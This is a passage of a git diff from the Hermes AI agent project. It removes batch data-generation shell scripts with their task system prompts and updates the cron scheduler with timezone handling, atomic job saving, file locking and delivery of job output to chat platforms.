# =============================================================================
# AI-native persistent memory via Honcho (https://honcho.dev/).
# Builds a deeper understanding of the user across sessions and tools.
# Runs alongside USER.md — additive, not a replacement.
#
# Requires: pip install honcho-ai
# Config: ~/.honcho/config.json (shared with Claude Code, Cursor, etc.)
# API key: HONCHO_API_KEY in ~/.hermes/.env or ~/.honcho/config.json
#
# Hermes-specific overrides (optional — most config comes from ~/.honcho/config.json):
# honcho: {}
# =============================================================================
# Display
# =============================================================================
display:
# Use compact banner mode
compact: false
# Tool progress display level (CLI and gateway)
# off: Silent — no tool activity shown, just the final response
# new: Show a tool indicator only when the tool changes (skip repeats)
# all: Show every tool call with a short preview (default)
# verbose: Full args, results, and debug logs (same as /verbose)
# Toggle at runtime with /verbose in the CLI
tool_progress: all
# Play terminal bell when agent finishes a response.
# Useful for long-running tasks — your terminal will ding when the agent is done.
# Works over SSH. Most terminals can be configured to flash the taskbar or play a sound.
bell_on_complete: false

3278
cli.py

File diff suppressed because it is too large Load Diff

View File

@@ -1,42 +0,0 @@
#!/bin/bash
# Browser-focused data generation run
# Uses browser-use-tasks.jsonl (6504 tasks)
# Distribution: browser 97%, web 20%, vision 12%, terminal 15%
# Create logs directory if it doesn't exist
mkdir -p logs
# Generate log filename with timestamp
LOG_FILE="logs/browser_tasks_$(date +%Y%m%d_%H%M%S).log"
echo "📝 Logging output to: $LOG_FILE"
echo "🌐 Running browser-focused tasks with browser_tasks distribution"
python batch_runner.py \
--dataset_file="browser-use-tasks.jsonl" \
--batch_size=20 \
--run_name="browser_tasks" \
--distribution="browser_tasks" \
--model="moonshotai/kimi-k2.5" \
--verbose \
--base_url="https://openrouter.ai/api/v1" \
--num_workers=50 \
--max_turns=60 \
--resume \
--ephemeral_system_prompt="You are an AI assistant with browser automation capabilities. Your primary task is to navigate and interact with web pages to accomplish user goals.
IMPORTANT GUIDELINES:
1. SEARCHING: Do NOT try to search directly on Google or other search engines via the browser - they block automated searches. Instead, ALWAYS use the web_search tool first to find URLs for any pages you need to visit, then use browser tools to navigate to those URLs.
2. COOKIE/PRIVACY DIALOGS: After navigating to a page, ALWAYS check if there are cookie consent dialogs, privacy popups, or overlay modals blocking the page. These appear in snapshots as 'dialog' elements with buttons like 'Close', 'Accept', 'Accept All', 'Decline', 'I Agree', 'Got it', 'OK', or 'X'. You MUST dismiss these dialogs FIRST by clicking the appropriate button before trying to interact with other page elements. After dismissing a dialog, take a fresh browser_snapshot to get updated element references.
3. HANDLING TIMEOUTS: If an action times out, it often means the element is blocked by an overlay or the page state has changed. Take a new snapshot to see the current page state and look for any dialogs or popups that need to be dismissed. If there is no dialog box to bypass, then try a new method or report the error to the user and complete the task.
4. GENERAL: Use browser tools to click elements, fill forms, extract information, and perform web-based tasks. If terminal is available, use it for any local file operations or computations needed to support your web tasks. Be thorough in verifying your actions and handle any errors gracefully by retrying or trying alternative approaches." \
2>&1 | tee "$LOG_FILE"
echo "✅ Log saved to: $LOG_FILE"
# --providers_allowed="gmicloud,siliconflow,atlas-cloud,z-ai,novita" \

View File

@@ -1,26 +0,0 @@
#!/bin/bash
# Create logs directory if it doesn't exist
mkdir -p logs
# Generate a timestamp for the log file
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
LOG_FILE="logs/imagen_eval_gpt5_${TIMESTAMP}.log"
echo "📝 Logging output to: $LOG_FILE"
python batch_runner.py \
--dataset_file="source-data/hermes-agent-imagen-data/hermes_agent_imagen_train_sft.jsonl" \
--batch_size=20 \
--run_name="imagen_train_sft_glm4.7" \
--distribution="image_gen" \
--model="z-ai/glm-4.7" \
--base_url="https://openrouter.ai/api/v1" \
--providers_allowed="gmicloud,siliconflow,atlas-cloud,z-ai,novita" \
--num_workers=50 \
--max_turns=25 \
--ephemeral_system_prompt="When generating an image for the user view the image by using the vision_analyze tool to ensure it is what the user wanted. If it isn't feel free to retry a few times. If none are perfect, choose the best option that is the closest match, and explain its imperfections. If the image generation tool fails, try again a few times. If the vision analyze tool fails, provide the image to the user and explain it is your best effort attempt." \
2>&1 | tee "$LOG_FILE"
echo "✅ Log saved to: $LOG_FILE"
# --verbose \

View File

@@ -1,26 +0,0 @@
#!/bin/bash
# Create logs directory if it doesn't exist
mkdir -p logs
# Generate log filename with timestamp
LOG_FILE="logs/glm4.7-thinking-sft1_$(date +%Y%m%d_%H%M%S).log"
echo "📝 Logging output to: $LOG_FILE"
python batch_runner.py \
--dataset_file="source-data/hermes-agent-agent-tasks-1/agent_tasks_sft_2.jsonl" \
--batch_size=20 \
--run_name="megascience_glm4.7-thinking-sft2" \
--distribution="science" \
--model="z-ai/glm-4.7" \
--base_url="https://openrouter.ai/api/v1" \
--providers_allowed="gmicloud,siliconflow,atlas-cloud,z-ai,novita" \
--num_workers=15 \
--max_turns=60 \
--ephemeral_system_prompt="You have access to a variety of tools to help you solve scientific, math, and technology problems presented to you. You can use them in sequence and build off of the results of prior tools you've used results. Always use the terminal or search tool if it can provide additional context, verify formulas, double check concepts and recent studies and understanding, doing all calculations, etc. You should only be confident in your own reasoning, knowledge, or calculations if you've exhaustively used all tools available to you to that can help you verify or validate your work. Always pip install any packages you need to use the python scripts you want to run. If you need to use a tool that isn't available, you can use the terminal tool to install or create it in many cases as well. Do not use the terminal tool to communicate with the user, as they cannot see your commands, only your final response after completing the task. Search for at least 3 sources, but not more than 12, so you can maintain focused context." \
2>&1 | tee "$LOG_FILE"
echo "✅ Log saved to: $LOG_FILE"
# --verbose \

View File

@@ -1,27 +0,0 @@
#!/bin/bash
# Create logs directory if it doesn't exist
mkdir -p logs
# Generate log filename with timestamp
LOG_FILE="logs/glm4.7-thinking-sft1-10k_$(date +%Y%m%d_%H%M%S).log"
echo "📝 Logging output to: $LOG_FILE"
python batch_runner.py \
--dataset_file="source-data/hermes-agent-megascience-data/hermes_agent_megascience_sft_train_1_10k.jsonl" \
--batch_size=20 \
--run_name="megascience_glm4.7-thinking-sft1" \
--distribution="science" \
--model="z-ai/glm-4.7" \
--base_url="https://openrouter.ai/api/v1" \
--providers_allowed="gmicloud,siliconflow,atlas-cloud,z-ai,novita" \
--num_workers=50 \
--max_turns=60 \
--resume \
--ephemeral_system_prompt="You have access to a variety of tools to help you solve scientific, math, and technology problems presented to you. You can use them in sequence and build off of the results of prior tools you've used for furthering results. Always use the terminal or search tool if it can provide additional context, verify formulas, double check concepts and recent studies and understanding, doing all calculations, etc. You should only be confident in your own reasoning, knowledge, or calculations if you've exhaustively used all tools available to you to that can help you verify or validate your work. Always pip install any packages you need to use the python scripts you want to run. If you need to use a tool that isn't available, you can use the terminal tool to install or create it in many cases as well. Do not use the terminal tool to communicate with the user, as they cannot see your commands, only your final response after completing the task. Search for at least 3 sources, but not more than 12, so you can maintain a focused context." \
2>&1 | tee "$LOG_FILE"
echo "✅ Log saved to: $LOG_FILE"
# --verbose \

View File

@@ -1,28 +0,0 @@
#!/bin/bash
# Create logs directory if it doesn't exist
mkdir -p logs
# Generate log filename with timestamp
LOG_FILE="logs/glm4.7-terminal-tasks_$(date +%Y%m%d_%H%M%S).log"
echo "📝 Logging output to: $LOG_FILE"
python batch_runner.py \
--dataset_file="source-data/raw_tasks_prompts.jsonl" \
--batch_size=20 \
--run_name="terminal-tasks-glm4.7-thinking" \
--distribution="default" \
--model="z-ai/glm-4.7" \
--base_url="https://openrouter.ai/api/v1" \
--providers_allowed="gmicloud,siliconflow,atlas-cloud,z-ai,novita" \
--num_workers=50 \
--max_turns=60 \
--ephemeral_system_prompt="You have access to a variety of tools to help you complete coding, system administration, and general computing tasks. You can use them in sequence and build off of the results of prior tools you've used. Always use the terminal tool to execute commands, write code, install packages, and verify your work. You should test and validate everything you create. Always pip install any packages you need (use --break-system-packages if needed). If you need a tool that isn't available, you can use the terminal to install or create it. Do not use the terminal tool to communicate with the user, as they cannot see your commands, only your final response after completing the task. Use web search when you need to look up documentation, APIs, or current best practices." \
2>&1 | tee "$LOG_FILE"
echo "✅ Log saved to: $LOG_FILE"
# --verbose \
# --resume \

View File

@@ -1,12 +0,0 @@
python batch_runner.py \
--dataset_file="hermes-agent-megascience-data/hermes_agent_megascience_eval.jsonl" \
--batch_size=10 \
--run_name="megascience_eval_gpt5_2" \
--distribution="science" \
--model="gpt-5" \
--base_url="https://api.openai.com/v1" \
--api_key="${OPENAI_API_KEY}" \
--num_workers=5 \
--max_turns=30 \
--verbose \
--ephemeral_system_prompt="You have access to a variety of tools to help you solve scientific, math, and technology problems presented to you. You can use them in sequence and build off of the results of prior tools you've used results. Always use a tool if it can provide additional context, verify formulas, double check concepts and recent studies and understanding, doing all calculations, etc. You should not be confident in your own reasoning, knowledge, or calculations without using a tool to verify or validate your work."

View File

@@ -1,12 +0,0 @@
python batch_runner.py \
--dataset_file="source-data/hermes-agent-agent-tasks-1/agent_tasks_eval.jsonl" \
--batch_size=50 \
--run_name="megascience_sft_minimax-m2.1-thinking-2-eval" \
--distribution="science" \
--model="minimax/minimax-m2.1" \
--base_url="https://openrouter.ai/api/v1" \
--providers_allowed="minimax" \
--num_workers=1 \
--max_turns=40 \
--verbose \
--ephemeral_system_prompt="You have access to a variety of tools to help you solve scientific, math, and technology problems presented to you. You can use them in sequence and build off of the results of prior tools you've used results. Always use the terminal or search tool if it can provide additional context, verify formulas, double check concepts and recent studies and understanding, doing all calculations, etc. You should only be confident in your own reasoning, knowledge, or calculations if you've exhaustively used all tools available to you to that can help you verify or validate your work. Always pip install any packages you need to use the python scripts you want to run. If you need to use a tool that isn't available, you can use the terminal tool to install or create it in many cases as well. Do not use the terminal tool to communicate with the user, as they cannot see your commands, only your final response after completing the task. Search for at least 3 sources, but not more than 12."

View File

@@ -1,29 +0,0 @@
#!/bin/bash
# Create logs directory if it doesn't exist
mkdir -p logs
# Generate log filename with timestamp
LOG_FILE="logs/glm4.7-terminal-tasks-newterm_$(date +%Y%m%d_%H%M%S).log"
echo "📝 Logging output to: $LOG_FILE"
python batch_runner.py \
--dataset_file="source-data/hermes-agent-agent-tasks-1/agent_tasks_eval.jsonl" \
--batch_size=1 \
--run_name="terminal-tasks-test-newterm" \
--distribution="terminal_only" \
--verbose \
--model="z-ai/glm-4.7" \
--base_url="https://openrouter.ai/api/v1" \
--providers_allowed="gmicloud,siliconflow,atlas-cloud,z-ai,novita" \
--num_workers=5 \
--max_turns=60 \
--ephemeral_system_prompt="You have access to a variety of tools to help you complete coding, system administration, and general computing tasks. You can use them in sequence and build off of the results of prior tools you've used. Always use the terminal tool to execute commands, write code, install packages, and verify your work. You should test and validate everything you create. Always pip install any packages you need (use --break-system-packages if needed). If you need a tool that isn't available, you can use the terminal to install or create it. Do not use the terminal tool to communicate with the user, as they cannot see your commands, only your final response after completing the task. Use web search when you need to look up documentation, APIs, or current best practices." \
2>&1 | tee "$LOG_FILE"
echo "✅ Log saved to: $LOG_FILE"
# --verbose \
# --resume \

View File

@@ -1,33 +0,0 @@
#!/bin/bash
# Terminal-only evaluation run using Modal sandboxes
# Uses 10 sample tasks from nous-terminal-tasks
# Create logs directory if it doesn't exist
mkdir -p logs
# Generate log filename with timestamp
LOG_FILE="logs/terminal_eval_$(date +%Y%m%d_%H%M%S).log"
echo "📝 Logging output to: $LOG_FILE"
echo "🔧 Using Modal sandboxes (TERMINAL_ENV=modal)"
# Set terminal to use Modal
export TERMINAL_ENV=modal
export TERMINAL_MODAL_IMAGE=nikolaik/python-nodejs:python3.11-nodejs20
export TERMINAL_TIMEOUT=300
python batch_runner.py \
--dataset_file="nous-terminal-tasks_eval.jsonl" \
--batch_size=5 \
--run_name="terminal_eval" \
--distribution="terminal_only" \
--model="z-ai/glm-4.7" \
--base_url="https://openrouter.ai/api/v1" \
--providers_allowed="gmicloud,siliconflow,atlas-cloud,z-ai,novita" \
--num_workers=2 \
--max_turns=30 \
--ephemeral_system_prompt="You have access to a terminal tool for executing commands. Use it to complete the task. Install any packages you need with apt-get or pip (use --break-system-packages if needed). Do not use interactive tools (vim, nano, python repl). If git output is large, pipe to cat." \
2>&1 | tee "$LOG_FILE"
echo "✅ Log saved to: $LOG_FILE"

View File

@@ -1,46 +0,0 @@
#!/bin/bash
# Mixed browser+terminal data generation run
# Uses mixed-browser-terminal-tasks.jsonl (200 tasks)
# Distribution: browser 92%, terminal 92%, web 35%, vision 15%, image_gen 15%
# Create logs directory if it doesn't exist
mkdir -p logs
# Generate log filename with timestamp
LOG_FILE="logs/mixed_tasks_$(date +%Y%m%d_%H%M%S).log"
echo "📝 Logging output to: $LOG_FILE"
echo "🔀 Running mixed browser+terminal tasks with mixed_tasks distribution"
# Set terminal environment
# SIF images are automatically built/cached by terminal_tool.py
export TERMINAL_ENV=singularity
export TERMINAL_SINGULARITY_IMAGE="docker://nikolaik/python-nodejs:python3.11-nodejs20"
export TERMINAL_TIMEOUT=300
# Set up Apptainer cache directories (use /scratch if available, otherwise /tmp)
if [ -d "/scratch" ] && [ -w "/scratch" ]; then
CACHE_BASE="/scratch/$USER/.apptainer"
else
CACHE_BASE="/tmp/$USER/.apptainer"
fi
export APPTAINER_CACHEDIR="$CACHE_BASE"
export APPTAINER_TMPDIR="$CACHE_BASE/tmp"
mkdir -p "$APPTAINER_CACHEDIR" "$APPTAINER_TMPDIR"
echo "📁 Apptainer cache: $APPTAINER_CACHEDIR"
python batch_runner.py \
--dataset_file="mixed-browser-terminal-tasks.jsonl" \
--batch_size=20 \
--run_name="mixed_tasks" \
--distribution="mixed_tasks" \
--model="moonshotai/kimi-k2.5" \
--base_url="https://openrouter.ai/api/v1" \
--num_workers=25 \
--max_turns=60 \
--ephemeral_system_prompt="You are an AI assistant capable of both browser automation and terminal operations. Use browser tools to navigate websites, interact with web pages, fill forms, and extract information. Use terminal tools to execute commands, write and run code, install packages (use --break-system-packages with pip if needed), and perform local computations. When web search is available, use it to find URLs, documentation, or current information. If vision is available, use it to analyze images or screenshots. If image generation is available, use it when the task requires creating images. Combine browser and terminal capabilities effectively - for example, you might use the browser to fetch data from a website and terminal to process or analyze it. Always verify your work and handle errors gracefully. Whenever you can do something in a terminal instead of a web browser, you should choose to do so, as it's much cheaper." \
2>&1 | tee "$LOG_FILE"
echo "✅ Log saved to: $LOG_FILE"

View File

@@ -1,50 +0,0 @@
#!/bin/bash
# Terminal-focused data generation run
# Uses nous-terminal-tasks.jsonl (597 tasks)
# Distribution: terminal 97%, web 15%, browser 0%, vision 8%, image_gen 3%
# Create logs directory if it doesn't exist
mkdir -p logs
# Generate log filename with timestamp
LOG_FILE="logs/terminal_tasks_$(date +%Y%m%d_%H%M%S).log"
echo "📝 Logging output to: $LOG_FILE"
echo "💻 Running terminal-focused tasks with terminal_tasks distribution"
# Set terminal environment
# SIF images are automatically built/cached by terminal_tool.py
export TERMINAL_ENV=singularity
export TERMINAL_SINGULARITY_IMAGE="docker://nikolaik/python-nodejs:python3.11-nodejs20"
export TERMINAL_TIMEOUT=300
# Set up Apptainer cache directories (use /scratch if available, otherwise /tmp)
if [ -d "/scratch" ] && [ -w "/scratch" ]; then
CACHE_BASE="/scratch/$USER/.apptainer"
else
CACHE_BASE="/tmp/$USER/.apptainer"
fi
export APPTAINER_CACHEDIR="$CACHE_BASE"
export APPTAINER_TMPDIR="$CACHE_BASE/tmp"
mkdir -p "$APPTAINER_CACHEDIR" "$APPTAINER_TMPDIR"
echo "📁 Apptainer cache: $APPTAINER_CACHEDIR"
echo "🐳 Image: $TERMINAL_SINGULARITY_IMAGE (auto-converted to SIF on first use)"
python batch_runner.py \
--dataset_file="nous-terminal-tasks.jsonl" \
--batch_size=5 \
--run_name="terminal_tasks-kimi-k2.5" \
--distribution="terminal_tasks" \
--model="moonshotai/kimi-k2.5" \
--verbose \
--base_url="https://openrouter.ai/api/v1" \
--num_workers=80 \
--max_turns=60 \
--providers_ignored="Novita" \
--resume \
--ephemeral_system_prompt="You have access to a terminal tool for executing commands and completing coding, system administration, and computing tasks. Use the terminal to write code, run scripts, install packages (use --break-system-packages with pip if needed), manipulate files, and verify your work. Always test and validate code you create. Do not use interactive tools like vim, nano, or python REPL. If git output is large, pipe to cat. When web search is available, use it to look up documentation, APIs, or best practices. If browser tools are available, use them for web interactions that require page manipulation. Do not use the terminal to communicate with the user - only your final response will be shown to them." \
2>&1 | tee "$LOG_FILE"
echo "✅ Log saved to: $LOG_FILE"

View File

@@ -1,23 +0,0 @@
#!/bin/bash
# Check if a prompt argument was provided
if [ $# -eq 0 ]; then
echo "Error: Please provide a prompt as an argument"
echo "Usage: $0 \"your prompt here\""
exit 1
fi
# Get the prompt from the first argument
PROMPT="$1"
# Set debug mode for web tools
export WEB_TOOLS_DEBUG=true
# Run the agent with the provided prompt
python run_agent.py \
--query "$PROMPT" \
--max_turns 30 \
--model claude-sonnet-4-5-20250929 \
--base_url https://api.anthropic.com/v1/ \
--api_key $ANTHROPIC_API_KEY \
--save_trajectories

View File

@@ -1,21 +0,0 @@
#!/bin/bash
# Test skills tool with Kimi K2.5
# Usage: ./configs/test_skills_kimi.sh "your query here"
# Example: ./configs/test_skills_kimi.sh "List available skills and show me the vllm skill"
# Default query if none provided
QUERY="${1:-List all available skills. Then show me the axolotl skill and view one of its reference files.}"
echo "🎯 Testing Skills Tool with Kimi K2.5"
echo "📝 Query: $QUERY"
echo "="
python run_agent.py \
--enabled_toolsets=skills \
--model="moonshotai/kimi-k2.5" \
--base_url="https://openrouter.ai/api/v1" \
--max_turns=10 \
--verbose \
--save_sample \
--query="$QUERY"

View File

@@ -6,12 +6,12 @@ This module provides scheduled task execution, allowing the agent to:
- Self-schedule reminders and follow-up tasks
- Execute tasks in isolated sessions (no prior context)
Usage:
# Run due jobs (for system cron integration)
python -c "from cron import tick; tick()"
# Or via CLI
python cli.py --cron-daemon
Cron jobs are executed automatically by the gateway daemon:
hermes gateway install # Install as system service (recommended)
hermes gateway # Or run in foreground
The gateway ticks the scheduler every 60 seconds. A file lock prevents
duplicate execution if multiple processes overlap.
"""
from cron.jobs import (
@@ -22,7 +22,7 @@ from cron.jobs import (
update_job,
JOBS_FILE,
)
from cron.scheduler import tick, run_daemon
from cron.scheduler import tick
__all__ = [
"create_job",
@@ -31,6 +31,5 @@ __all__ = [
"remove_job",
"update_job",
"tick",
"run_daemon",
"JOBS_FILE",
]

View File

@@ -6,6 +6,7 @@ Output is saved to ~/.hermes/cron/output/{job_id}/{timestamp}.md
"""
import json
import tempfile
import os
import re
import uuid
@@ -13,6 +14,8 @@ from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional, Dict, List, Any
from hermes_time import now as _hermes_now
try:
from croniter import croniter
HAS_CRONITER = True
@@ -23,7 +26,7 @@ except ImportError:
# Configuration
# =============================================================================
HERMES_DIR = Path.home() / ".hermes"
HERMES_DIR = Path(os.getenv("HERMES_HOME", Path.home() / ".hermes"))
CRON_DIR = HERMES_DIR / "cron"
JOBS_FILE = CRON_DIR / "jobs.json"
OUTPUT_DIR = CRON_DIR / "output"
@@ -127,7 +130,7 @@ def parse_schedule(schedule: str) -> Dict[str, Any]:
# Duration like "30m", "2h", "1d" → one-shot from now
try:
minutes = parse_duration(schedule)
run_at = datetime.now() + timedelta(minutes=minutes)
run_at = _hermes_now() + timedelta(minutes=minutes)
return {
"kind": "once",
"run_at": run_at.isoformat(),
@@ -145,37 +148,50 @@ def parse_schedule(schedule: str) -> Dict[str, Any]:
)
def _ensure_aware(dt: datetime) -> datetime:
"""Make a naive datetime tz-aware using the configured timezone.
Handles backward compatibility: timestamps stored before timezone support
are naive (server-local). We assume they were in the same timezone as
the current configuration so comparisons work without crashing.
"""
if dt.tzinfo is None:
tz = _hermes_now().tzinfo
return dt.replace(tzinfo=tz)
return dt
def compute_next_run(schedule: Dict[str, Any], last_run_at: Optional[str] = None) -> Optional[str]:
"""
Compute the next run time for a schedule.
Returns ISO timestamp string, or None if no more runs.
"""
now = datetime.now()
now = _hermes_now()
if schedule["kind"] == "once":
run_at = datetime.fromisoformat(schedule["run_at"])
run_at = _ensure_aware(datetime.fromisoformat(schedule["run_at"]))
# If in the future, return it; if in the past, no more runs
return schedule["run_at"] if run_at > now else None
elif schedule["kind"] == "interval":
minutes = schedule["minutes"]
if last_run_at:
# Next run is last_run + interval
last = datetime.fromisoformat(last_run_at)
last = _ensure_aware(datetime.fromisoformat(last_run_at))
next_run = last + timedelta(minutes=minutes)
else:
# First run is now + interval
next_run = now + timedelta(minutes=minutes)
return next_run.isoformat()
elif schedule["kind"] == "cron":
if not HAS_CRONITER:
return None
cron = croniter(schedule["expr"], now)
next_run = cron.get_next(datetime)
return next_run.isoformat()
return None
@@ -200,8 +216,19 @@ def load_jobs() -> List[Dict[str, Any]]:
def save_jobs(jobs: List[Dict[str, Any]]):
"""Save all jobs to storage."""
ensure_dirs()
with open(JOBS_FILE, 'w', encoding='utf-8') as f:
json.dump({"jobs": jobs, "updated_at": datetime.now().isoformat()}, f, indent=2)
fd, tmp_path = tempfile.mkstemp(dir=str(JOBS_FILE.parent), suffix='.tmp', prefix='.jobs_')
try:
with os.fdopen(fd, 'w', encoding='utf-8') as f:
json.dump({"jobs": jobs, "updated_at": _hermes_now().isoformat()}, f, indent=2)
f.flush()
os.fsync(f.fileno())
os.replace(tmp_path, JOBS_FILE)
except BaseException:
try:
os.unlink(tmp_path)
except OSError:
pass
raise
def create_job(
@@ -237,7 +264,7 @@ def create_job(
deliver = "origin" if origin else "local"
job_id = uuid.uuid4().hex[:12]
now = datetime.now().isoformat()
now = _hermes_now().isoformat()
job = {
"id": job_id,
@@ -316,7 +343,7 @@ def mark_job_run(job_id: str, success: bool, error: Optional[str] = None):
jobs = load_jobs()
for i, job in enumerate(jobs):
if job["id"] == job_id:
now = datetime.now().isoformat()
now = _hermes_now().isoformat()
job["last_run_at"] = now
job["last_status"] = "ok" if success else "error"
job["last_error"] = error if not success else None
@@ -349,7 +376,7 @@ def mark_job_run(job_id: str, success: bool, error: Optional[str] = None):
def get_due_jobs() -> List[Dict[str, Any]]:
"""Get all jobs that are due to run now."""
now = datetime.now()
now = _hermes_now()
jobs = load_jobs()
due = []
@@ -361,7 +388,7 @@ def get_due_jobs() -> List[Dict[str, Any]]:
if not next_run:
continue
next_run_dt = datetime.fromisoformat(next_run)
next_run_dt = _ensure_aware(datetime.fromisoformat(next_run))
if next_run_dt <= now:
due.append(job)
@@ -374,7 +401,7 @@ def save_job_output(job_id: str, output: str):
job_output_dir = OUTPUT_DIR / job_id
job_output_dir.mkdir(parents=True, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
timestamp = _hermes_now().strftime("%Y-%m-%d_%H-%M-%S")
output_file = job_output_dir / f"{timestamp}.md"
with open(output_file, 'w', encoding='utf-8') as f:

View File

@@ -1,63 +1,272 @@
"""
Cron job scheduler - executes due jobs.
This module provides:
- tick(): Run all due jobs once (for system cron integration)
- run_daemon(): Run continuously, checking every 60 seconds
Provides tick() which checks for due jobs and runs them. The gateway
calls this every 60 seconds from a background thread.
Uses a file-based lock (~/.hermes/cron/.tick.lock) so only one tick
runs at a time if multiple processes overlap.
"""
import asyncio
import logging
import os
import sys
import time
import traceback
# fcntl is Unix-only; on Windows use msvcrt for file locking
try:
import fcntl
except ImportError:
fcntl = None
try:
import msvcrt
except ImportError:
msvcrt = None
from datetime import datetime
from pathlib import Path
from typing import Optional
from hermes_time import now as _hermes_now
logger = logging.getLogger(__name__)
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from cron.jobs import get_due_jobs, mark_job_run, save_job_output
# Resolve Hermes home directory (respects HERMES_HOME override)
_hermes_home = Path(os.getenv("HERMES_HOME", Path.home() / ".hermes"))
def run_job(job: dict) -> tuple[bool, str, Optional[str]]:
# File-based lock prevents concurrent ticks from gateway + daemon + systemd timer
_LOCK_DIR = _hermes_home / "cron"
_LOCK_FILE = _LOCK_DIR / ".tick.lock"
def _resolve_origin(job: dict) -> Optional[dict]:
"""Extract origin info from a job, returning {platform, chat_id, chat_name} or None."""
origin = job.get("origin")
if not origin:
return None
platform = origin.get("platform")
chat_id = origin.get("chat_id")
if platform and chat_id:
return origin
return None
def _deliver_result(job: dict, content: str) -> None:
"""
Deliver job output to the configured target (origin chat, specific platform, etc.).
Uses the standalone platform send functions from send_message_tool so delivery
works whether or not the gateway is running.
"""
deliver = job.get("deliver", "local")
origin = _resolve_origin(job)
if deliver == "local":
return
# Resolve target platform + chat_id
if deliver == "origin":
if not origin:
logger.warning("Job '%s' deliver=origin but no origin stored, skipping delivery", job["id"])
return
platform_name = origin["platform"]
chat_id = origin["chat_id"]
elif ":" in deliver:
platform_name, chat_id = deliver.split(":", 1)
else:
# Bare platform name like "telegram" — need to resolve to origin or home channel
platform_name = deliver
if origin and origin.get("platform") == platform_name:
chat_id = origin["chat_id"]
else:
# Fall back to home channel
chat_id = os.getenv(f"{platform_name.upper()}_HOME_CHANNEL", "")
if not chat_id:
logger.warning("Job '%s' deliver=%s but no chat_id or home channel. Set via: hermes config set %s_HOME_CHANNEL <channel_id>", job["id"], deliver, platform_name.upper())
return
from tools.send_message_tool import _send_to_platform
from gateway.config import load_gateway_config, Platform
platform_map = {
"telegram": Platform.TELEGRAM,
"discord": Platform.DISCORD,
"slack": Platform.SLACK,
"whatsapp": Platform.WHATSAPP,
"signal": Platform.SIGNAL,
}
platform = platform_map.get(platform_name.lower())
if not platform:
logger.warning("Job '%s': unknown platform '%s' for delivery", job["id"], platform_name)
return
try:
config = load_gateway_config()
except Exception as e:
logger.error("Job '%s': failed to load gateway config for delivery: %s", job["id"], e)
return
pconfig = config.platforms.get(platform)
if not pconfig or not pconfig.enabled:
logger.warning("Job '%s': platform '%s' not configured/enabled", job["id"], platform_name)
return
# Run the async send in a fresh event loop (safe from any thread)
try:
result = asyncio.run(_send_to_platform(platform, pconfig, chat_id, content))
except RuntimeError:
# asyncio.run() fails if there's already a running loop in this thread;
# spin up a new thread to avoid that.
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=1) as pool:
future = pool.submit(asyncio.run, _send_to_platform(platform, pconfig, chat_id, content))
result = future.result(timeout=30)
except Exception as e:
logger.error("Job '%s': delivery to %s:%s failed: %s", job["id"], platform_name, chat_id, e)
return
if result and result.get("error"):
logger.error("Job '%s': delivery error: %s", job["id"], result["error"])
else:
logger.info("Job '%s': delivered to %s:%s", job["id"], platform_name, chat_id)
# Mirror the delivered content into the target's gateway session
try:
from gateway.mirror import mirror_to_session
mirror_to_session(platform_name, chat_id, content, source_label="cron")
except Exception:
pass
def run_job(job: dict) -> tuple[bool, str, str, Optional[str]]:
"""
Execute a single cron job.
Returns:
Tuple of (success, output, error_message)
Tuple of (success, full_output_doc, final_response, error_message)
"""
from run_agent import AIAgent
job_id = job["id"]
job_name = job["name"]
prompt = job["prompt"]
origin = _resolve_origin(job)
print(f"[cron] Running job '{job_name}' (ID: {job_id})")
print(f"[cron] Prompt: {prompt[:100]}{'...' if len(prompt) > 100 else ''}")
logger.info("Running job '%s' (ID: %s)", job_name, job_id)
logger.info("Prompt: %s", prompt[:100])
# Inject origin context so the agent's send_message tool knows the chat
if origin:
os.environ["HERMES_SESSION_PLATFORM"] = origin["platform"]
os.environ["HERMES_SESSION_CHAT_ID"] = str(origin["chat_id"])
if origin.get("chat_name"):
os.environ["HERMES_SESSION_CHAT_NAME"] = origin["chat_name"]
try:
# Create agent with default settings
# Jobs run in isolated sessions (no prior context)
# Re-read .env and config.yaml fresh every run so provider/key
# changes take effect without a gateway restart.
from dotenv import load_dotenv
try:
load_dotenv(str(_hermes_home / ".env"), override=True, encoding="utf-8")
except UnicodeDecodeError:
load_dotenv(str(_hermes_home / ".env"), override=True, encoding="latin-1")
model = os.getenv("HERMES_MODEL") or os.getenv("LLM_MODEL") or "anthropic/claude-opus-4.6"
# Load config.yaml for model, reasoning, prefill, toolsets, provider routing
_cfg = {}
try:
import yaml
_cfg_path = str(_hermes_home / "config.yaml")
if os.path.exists(_cfg_path):
with open(_cfg_path) as _f:
_cfg = yaml.safe_load(_f) or {}
_model_cfg = _cfg.get("model", {})
if isinstance(_model_cfg, str):
model = _model_cfg
elif isinstance(_model_cfg, dict):
model = _model_cfg.get("default", model)
except Exception:
pass
# Reasoning config from env or config.yaml
reasoning_config = None
effort = os.getenv("HERMES_REASONING_EFFORT", "")
if not effort:
effort = str(_cfg.get("agent", {}).get("reasoning_effort", "")).strip()
if effort and effort.lower() != "none":
valid = ("xhigh", "high", "medium", "low", "minimal")
if effort.lower() in valid:
reasoning_config = {"enabled": True, "effort": effort.lower()}
elif effort.lower() == "none":
reasoning_config = {"enabled": False}
# Prefill messages from env or config.yaml
prefill_messages = None
prefill_file = os.getenv("HERMES_PREFILL_MESSAGES_FILE", "") or _cfg.get("prefill_messages_file", "")
if prefill_file:
import json as _json
pfpath = Path(prefill_file).expanduser()
if not pfpath.is_absolute():
pfpath = _hermes_home / pfpath
if pfpath.exists():
try:
with open(pfpath, "r", encoding="utf-8") as _pf:
prefill_messages = _json.load(_pf)
if not isinstance(prefill_messages, list):
prefill_messages = None
except Exception:
prefill_messages = None
# Max iterations
max_iterations = _cfg.get("agent", {}).get("max_turns") or _cfg.get("max_turns") or 90
# Provider routing
pr = _cfg.get("provider_routing", {})
from hermes_cli.runtime_provider import (
resolve_runtime_provider,
format_runtime_provider_error,
)
try:
runtime = resolve_runtime_provider(
requested=os.getenv("HERMES_INFERENCE_PROVIDER"),
)
except Exception as exc:
message = format_runtime_provider_error(exc)
raise RuntimeError(message) from exc
agent = AIAgent(
model=os.getenv("HERMES_MODEL", "anthropic/claude-opus-4.6"),
model=model,
api_key=runtime.get("api_key"),
base_url=runtime.get("base_url"),
provider=runtime.get("provider"),
api_mode=runtime.get("api_mode"),
max_iterations=max_iterations,
reasoning_config=reasoning_config,
